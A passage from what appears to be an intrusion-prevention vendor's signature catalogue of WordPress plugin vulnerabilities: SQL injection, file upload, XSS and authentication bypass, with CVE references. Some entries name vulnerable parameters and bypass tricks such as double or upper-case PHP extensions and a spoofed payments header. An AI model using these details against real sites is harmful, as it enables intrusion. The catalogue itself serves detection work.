HTTP_CSU-Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection

References:

CVE-2023-6360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6360

Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution

About this vulnerability:

A vulnerability in WP Ninjas Ninja Forms File Upload

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WP Ninjas Ninja Forms File Upload

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in the Ninja Forms Plugin for WordPress. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution

References:

CVE-2019-10869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10869

Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi

About this vulnerability:

A vulnerability in the Paid Membership Pro WordPress plugin.

Risk:

High

First detected in:

sgpkg-ips-1550-5242

Last changed:

sgpkg-ips-1550-5242

Platform:

Generic

Software:

Wordpress Paid Membership

Type:

Input Validation

Description:

A vulnerability in the Paid Membership Pro WordPress plugin, versions before 2.9.8, which allows remote attackers to execute arbitrary SQL commands via /pmpro/v1/order in the "code" parameter.

Situation:

HTTP_CRL-Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi

References:

CVE-2023-23488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23488

Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload

About this vulnerability:

An attempt to exploit a vulnerability in the WordPress Paid Memberships Pro Plugin detected.

Risk:

High

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Generic

Software:

Wordpress Paid Membership

Type:

Input Validation

Description:

A vulnerability in the WordPress Paid Memberships Pro Plugin, versions prior to 2.12.4, which allows remote attackers to upload arbitrary files and execute code by sending a crafted request to the target server, due to insufficient file type validation in the pmpro_paypalexpress_session_vars_for_user_fields function.

Situation:

HTTP_CS-Wordpress-Paid-Memberships-Pro-Plugin-Arbitrary-File-Upload

References:

CVE-2023-6187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6187

Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS

About this vulnerability:

A vulnerability in WordPress Project Paid Memberships Pro Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Missing input validation in the pmpro_getCheckoutButton() method in the Wordpress Paid Memberships Pro Plugin causes a stored cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS

References:

CVE-2022-4830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4830

Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Paid Memberships Pro Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1594-5242

Last changed:

sgpkg-ips-1594-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

The WordPress Paid Memberships Pro Plugin does not properly validate and escape shortcode parameter in pmpro_shortcode_membership() before using them in SQL statements, causing an SQL injection vulnerability. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection

References:

CVE-2023-0631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0631

Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project Paid Memberships Pro Plugin

Risk:

High

First detected in:

sgpkg-ips-1441-5242

Last changed:

sgpkg-ips-1441-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the Wordpress plugin Paid Memberships Pro. The vulnerability is due to insufficient input validation of the discount_code parameter while processing requests to the /pmpro/v1/checkout_level endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation in the worst case could result in execution of arbitrary SQL queries.

Situation:

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection

References:

CVE-2021-25114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25114

Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762

About this vulnerability:

An attempt to exploit a vulnerability in WordPress Perfect Survey plugin detected

Risk:

High

First detected in:

sgpkg-ips-1500-5242

Last changed:

sgpkg-ips-1500-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the Perfect Survey WordPress plugin versions before 1.5.2.

Situation:

HTTP_CSU-Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762

References:

CVE-2021-24762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24762

Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project 10Web Photo Gallery

Risk:

Moderate

First detected in:

sgpkg-ips-1471-5242

Last changed:

sgpkg-ips-1471-5242

Platform:

Generic

Software:

WordPress 10Web Photo Gallery Plugin

Type:

Input Validation

Description:

Improper input validation for the filter_tag parameter causes an SQL injection vulnerability in the WordPress Photo Gallery plugin. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection

References:

CVE-2022-1281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1281

Wordpress-Photo-Gallery-Plugin-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project 10Web Photo Gallery

Risk:

Moderate

First detected in:

sgpkg-ips-1448-5242

Last changed:

sgpkg-ips-1448-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper input validation for the bwg_tag_id_bwg_thumbnails_0 parameter causes an SQL injection vulnerability in the Wordpress Photo Gallery plugin. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Photo-Gallery-Plugin-SQL-Injection

References:

CVE-2022-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0169

Wordpress-Photo-Gallery-Unrestricted-File-Upload

About this vulnerability:

Wordpress Photo Gallery Unrestricted File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress Photo Gallery

Type:

Input Validation

Description:

A vulnerability in WordPress Photo Gallery 1.2.5 which allows remote attackers to upload arbitrary PHP files, and execute them in the context of the web server process, due to the post() method in UploadHandler.php not properly sanitizing the user uploaded files.

Situation:

HTTP_CS-Wordpress-Photo-Gallery-Unrestricted-File-Upload

References:

CVE-2014-9312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9312

OSVDB-117676
http://www.osvdb.org/117676

Wordpress-PHPMailer-Host-Header-Command-Injection

About this vulnerability:

A WordPress PHPMailer Host Header Command Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-1017-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

WordPress

Type:

Input Validation

Description:

A vulnerability in WordPress core 4.6 which allows remote attackers to execute arbitrary code via a spoofed header to PHPMailer, due to improper input validation.

Situation:

HTTP_CSH-Wordpress-PHPMailer-Host-Header-Command-Injection

References:

CVE-2016-10033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033

Wordpress-Plainview-Activity-Monitor-RCE

About this vulnerability:

A vulnerability in Wordpress Plainview Activity Monitor

Risk:

High

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wordpress Plainview Activity Monitor

Type:

Code Injection

Description:

There exists a vulnerability in Wordpress Plainview Activity Monitor, version 20161228, which allows remote attackers to execute arbitrary code in the ip parameter within a reuest to wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools.

Situation:

HTTP_CRL-Wordpress-Plainview-Activity-Monitor-RCE

References:

CVE-2018-15877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877

Wordpress-Plugin-Backup-Guard-Authenticated-RCE

About this vulnerability:

A vulnerability in Wordpress Backup Guard Plugin.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Generic

Software:

Wordpress Backup Guard Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress Backup Guard Plugin, versions before 1.6.0, which allow a remote attacker to upload an arbitrary PHP file due to the insufficient check for an SGBP file extension.

Situation:

HTTP_CS-Wordpress-Plugin-Backup-Guard-Authenticated-RCE

References:

CVE-2021-24155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24155

Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation

About this vulnerability:

A vulnerability in Wordpress bbPress plugin

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Generic

Software:

Wordpress bbPress

Type:

Input Validation

Description:

There exists a vulnerability in the plugin bbPress for WordPress, versions before 2.6.5, which allows remote attackers to bypass authentication when registration is enabled, due to lack of validation on user authorization requests.

Situation:

HTTP_CRL-Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation

References:

CVE-2020-13693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13693

Wordpress-Plugin-Catch-Themes-Demo-Import-RCE

About this vulnerability:

A vulnerability in the Wordpress Catch Themes Demo Plugin.

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

Wordpress Catch Themes Demo Import Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress Catch Themes Demo Plugin, before 1.8, which allows remote attackers to execute arbitrary code on a target system via an arbitrary file upload, due to unsufficient file type validation.

Situation:

HTTP_CS-Wordpress-Plugin-Catch-Themes-Demo-Import-RCE

References:

CVE-2021-39352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39352

Wordpress-Plugin-Duplicator-Arbitrary-File-Read

About this vulnerability:

An attempt to exploit a vulnerability in Wordpress Plugin Duplicator detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

WordPress

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Wordpress Plugin Duplicator detected.

Situation:

HTTP_CSU-Wordpress-Plugin-Duplicator-Arbitrary-File-Read

References:

CVE-2020-11738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11738

Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution

About this vulnerability:

A vulnerability in the WordPress plugin Elementor.

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

WordPress Elementor Plugin

Type:

Input Validation

Description:

A vulnerability in the WordPress plugin Elementor, versions 3.6.0 - 3.6.2, which allows remote attackers to execute arbitrary code by uploading zip files which contain malicious php.

Situation:

File-Zip_Wordpress-Plugin-Elementor-Authenticated-Upload-Remote-Code-Execution

References:

CVE-2022-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1329

Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344

About this vulnerability:

A vulnerability in the WordPress Like Button Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

WordPress Like Button Plugin

Type:

Insecure Configuration

Description:

An vulnerability in the WordPress Like Button Plugin, versions 1.6.0 and before, which allows remote attackers to bypass authentication and update settings via the each_page_url and code_snippet parameter in a request to wp-admin/admin.php?page=facebook-like-button.

Situation:

HTTP_CRL-Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344

References:

CVE-2019-13344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13344

Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE

About this vulnerability:

A vulnerability in Wordpress Modern Events Calendar Plugin.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Generic

Software:

Wordpress Modern Events Calendar Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress Modern Events Calendar Plugin, versions before 5.16.5, which allow a remote attacker to upload an arbitrary PHP file by setting the content-type to "text/csv" in a request.

Situation:

HTTP_CS-Wordpress-Plugin-Modern-Events-Calendar-Authenticated-RCE

References:

CVE-2021-24145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24145

Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE

About this vulnerability:	A vulnerability in WordPress Plugin Pie Register.
Risk:	High
First detected in:	sgpkg-ips-1404-5242
Last changed:	sgpkg-ips-1404-5242
Platform:	Generic
Software:	WordPress Plugin Pie Register
Type:	Malfunction
Description:	A vulnerability in the WordPress plugin Pie Register, versions 3.7.1.4 and before, which allows remote attackers to generate a valid admin cookie which is then used to generate and upload malicious plugins.
Situation:	HTTP_CRL-Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE

Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969

About this vulnerability:

An attempt to exploit a vulnerability in WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection detected

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

WordPress Plugin Pie Register

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection detected.

Situation:

HTTP_CRL-Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969

References:

CVE-2018-10969
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10969

Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE

About this vulnerability:

A vulnerability in Wordpress SP Project And Document Plugin.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Generic

Software:

Wordpress SP Project And Document Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress SP Project And Document Plugin, versions before 4.22, which allow a remote attacker to upload an arbitrary PHP file by using upper case letters in the PHP extension, due to the security check searching for only lower case letters.

Situation:

HTTP_CS-Wordpress-Plugin-SP-Project-And-Document-Authenticated-RCE

References:

CVE-2021-24347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24347

Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation

About this vulnerability:

An attempt to exploit a vulnerability in WooCommerce-Payments plugin for Wordpress detected

Risk:

High

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

WooCommerce-Payments Plugin

Type:

Insecure Configuration

Description:

A vulnerability in the WooCommerce-Payments plugin for Wordpress, version 5.6.1 and before, which allows remote attackers to bypass authentication by specifying a valid user ID number within the X-WCPAY-PLATFORM-CHECKOUT-USER header, giving the ability to use the API to create a new user with administrative privileges on the target WordPress site.

Situation:

HTTP_CS-Wordpress-Plugin-Woocommerce-Payments-Unauthenticated-Admin-Creation

References:

CVE-2023-28121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28121

Wordpress-Popular-Posts-Authenticated-RCE

About this vulnerability:

A vulnerability in the Wordpress Popular Posts Plugin.

Risk:

High

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

Wordpress Popular Posts Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress Popular Posts Plugin, versions 5.3.2 and before, which allow remote attackers to execute arbitrary code by sending a php file with a double extension (.gif.php), due to unsufficient validation of extension type.

Situation:

HTTP_CRL-Wordpress-Popular-Posts-Authenticated-RCE

References:

CVE-2021-42362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42362

Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Popup Maker plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1478-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the Popup Maker plugin for WordPress. This vulnerability is due to improper input validation for the popup settings process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting

References:

CVE-2022-1104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1104

Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498

About this vulnerability:

An attempt to exploit a vulnerability in WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper parsing of query parameters causes a vulnerability in WordPress Query Console. A successful exploitation allows a remote attacker to execute code on the target system.

Situation:

HTTP_CRL-Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498

References:

CVE-2024-50498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498

Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924

About this vulnerability:

An attempt to exploit a vulnerability in WordPress detected

Risk:

High

First detected in:

sgpkg-ips-1821-5242

Last changed:

sgpkg-ips-1821-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

The Really Simple Security plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the "check_login_and_get_user" function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).

Situation:

HTTP_CRL-Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924

References:

CVE-2024-10924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10924

Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi

About this vulnerability:

A vulnerability in the Wordpress RegistrationMagic Plugin.

Risk:

High

First detected in:

sgpkg-ips-1436-5242

Last changed:

sgpkg-ips-1436-5242

Platform:

Generic

Software:

Wordpress RegistrationMagic Plugin

Type:

Input Validation

Description:

A vulnerability in the Wordpress RegistrationMagic Plugin, versions before 5.0.1.5, which allows remote attackers to execute arbitrary SQL commands via the task_ids parameter, due to insufficient validation.

Situation:

HTTP_CRL-Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi

References:

CVE-2021-24862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24862

Wordpress-Rest-API-Posts-Controller-Privilege-Escalation

About this vulnerability:	A vulnerability in WordPress Project WordPress
Risk:	High
First detected in:	sgpkg-ips-855-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress
Type:	Input Validation
Description:	There exists a privilege excalation vulnerability in WordPress. A remote, unauthenticated attacker can use this to arbitrarily modify a WordPress post content.
Situation:	HTTP_CRL-Wordpress-Rest-API-Posts-Controller-Privilege-Escalation

Wordpress-RevSlider-Vulnerability

About this vulnerability:	A vulnerability in WordPress RevSlider plugin
Risk:	High
First detected in:	sgpkg-ips-634-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress RevSlider Plugin
Type:	Malfunction
Description:	A vulnerability exists in WordPress plugin Slider Revolution (RevSlider) version 4.6 and earlier that allows a remote attacker to upload a malicious file on the server. A malware known as "SoakSoak" exploits this vulnerability.
Situation:	HTTP_CSU-Possible-Scan-For-Wordpress-RevSlider-Vulnerability

Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in WordPress Project Royal Elementor Addons and Templates Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1654-5242

Last changed:

sgpkg-ips-1709-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper user input validation when processing forms file uploads cayses a file upload vulnerability in the WordPress Project Royal Elementor Addons and Templates Plugin. A successful exploit allows an attacker to execute code on the target system with the privileges of the PHP process.

Situation:

HTTP_CS-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
HTTP_CRL-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload

References:

CVE-2023-5360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5360

Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

There exists a cross-site script insertion vulnerability in WordPress. The vulnerability is due to lack of sanitization for data supplied in the HTTP Host header. Remote attackers can exploit this vulnerability to execute arbitrary HTML and script code in the users' browser sessions in the context of the vulnerable web site. A successful attack will inject malicious HTML or script code in the target server RSS feed. If the URL in the RSS feed is opened on a client's browser, the arbitrary HTML and script code would be executed in the user's browser session, in the security context of the affected Web site.

Situation:

HTTP_CSH-Wordpress-RSS-Feed-Generator-Self_Link-HTTP_Host-Cross-Site-Scripting

References:

CVE-2008-5278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5278

BID-32476
http://www.securityfocus.com/bid/32476

OSVDB-50214
http://www.osvdb.org/50214

Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi

About this vulnerability:

A vulnerability in the WordPress Secure Copy Content Protection and Content Locking Plugin.

Risk:

High

First detected in:

sgpkg-ips-1445-5242

Last changed:

sgpkg-ips-1445-5242

Platform:

Generic

Software:

WordPress Secure Copy Content Protection and Content Locking Plugin

Type:

SQL Injection

Description:

A vulnerability in the WordPress Secure Copy Content Protection and Content Locking Plugin, versions before 2.8.2, which allows remote attackers to execute SQL commands via the sccp_id[] parameter of the ays_sccp_results_export_file AJAX action, due to insufficient validation.

Situation:

HTTP_CRL-Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi

References:

CVE-2021-24931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24931

Wordpress-SEO-Plugin-Url-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project SEO Plugin by Squirrly SEO

Risk:

Moderate

First detected in:

sgpkg-ips-1759-5242

Last changed:

sgpkg-ips-1759-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for in SEO Plugin for WordPress. This vulnerability is due to improper input validation for the url parameter. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection or, in the worst case, remote code execution in the context of the mysql user.

Situation:

HTTP_CSU-Wordpress-SEO-Plugin-Url-SQL-Injection
HTTP_CRL-Wordpress-SEO-Plugin-Url-SQL-Injection

References:

CVE-2024-6497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6497

Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project Shield Security Plugin

Risk:

High

First detected in:

sgpkg-ips-1599-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Generic

Software:

WordPress Shield Security Plugin

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the WordPress Shield Security plugin. This vulnerability is due to improper input validation of User-Agent HTTP header. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CSH-Wordpress-Shield-Security-Plugin-Activity-Log-Stored-Cross-Site-Scripting

References:

CVE-2023-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0992

Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826

About this vulnerability:

A vulnerability in WordPress Simple Ads Manager

Risk:

High

First detected in:

sgpkg-ips-751-5211

Last changed:

sgpkg-ips-1299-5242

Platform:

Generic

Software:

WordPress Simple Ads Manager

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in WordPress Simple Ads Manager. Information such as usernames and email addresses can inadvertently be leaked.

Situation:

HTTP_CRL-Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826

References:

CVE-2015-2826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2826

Wordpress-Simple-File-List-Plugin-Path-Traversal

About this vulnerability:

A vulnerability in WordPress Simple File List Plugin

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

WordPress Simple File List Plugin

Type:

Input Validation

Description:

A path traversal vulnerability has been reported in WordPress Simple File List Plugin. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. This can be leveraged to obtain sensitive information from a target system.

Situation:

HTTP_CSU-Wordpress-Simple-File-List-Plugin-Path-Traversal

References:

CVE-2022-1119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1119

Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE

About this vulnerability:	An attempt to exploit a vulnerability in WordPress Simple File List Plugin
Risk:	High
First detected in:	sgpkg-ips-1340-5242
Last changed:	sgpkg-ips-1340-5242
Platform:	Generic
Software:	WordPress Simple File List Plugin
Type:	Malfunction
Description:	There exists a vulberability in WordPress Simple File List Plugin, versions before 4.2.3, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file with an allowed extension, e.g. png, then renaming and executing the file as the file extension restrictions do not apply to the renaming of files.
Situation:	HTTP_CS-Wordpress-Simple-File-List-Plugin-Unauthenticated-RCE

Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion

About this vulnerability:

An attempt to exploit a vulnerability in WordPress Social Warfare Plugin detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

WordPress

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in WordPress Social Warfare Plugin detected.

Situation:

HTTP_CSU-Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion

References:

CVE-2019-9978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978

Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project WP Statistics

Risk:

Moderate

First detected in:

sgpkg-ips-1567-5242

Last changed:

sgpkg-ips-1567-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitization of user-supplied data in the search_engine parameter of requests sent to the WP Statistics plugin causes an SQL injection vulnerability, which allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection

References:

CVE-2022-4230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4230

Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in WordPress Project The Events Calendar Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper input validation for the RSVP name parameter causes a cross-site scripting vulnerability in the Events Calendar Plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting

References:

CVE-2024-6931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6931

Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection

About this vulnerability:

A vulnerability in WordPress Project TI WooCommerce Wishlist Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1445-5242

Last changed:

sgpkg-ips-1445-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Insufficient sanitation of user-supplied data in item_id parameter in requests to the wishlist plugin causes an SQL injection vulnerability in WordPress. A successful exploit may allow the attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection

References:

CVE-2022-0412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0412

Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in TI WooCommerce Wishlist plugin for WordPress

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

WordPress

Type:

Input Validation

Description:

Improper validation of user input causes an SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection

References:

CVE-2024-43917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43917

Wordpress-Tribulant-Slideshow-Gallery-PHP-File-Upload

About this vulnerability:

A Wordpress Tribulant Slideshow Gallery PHP File Upload vulnerability.

Risk:

High

First detected in:
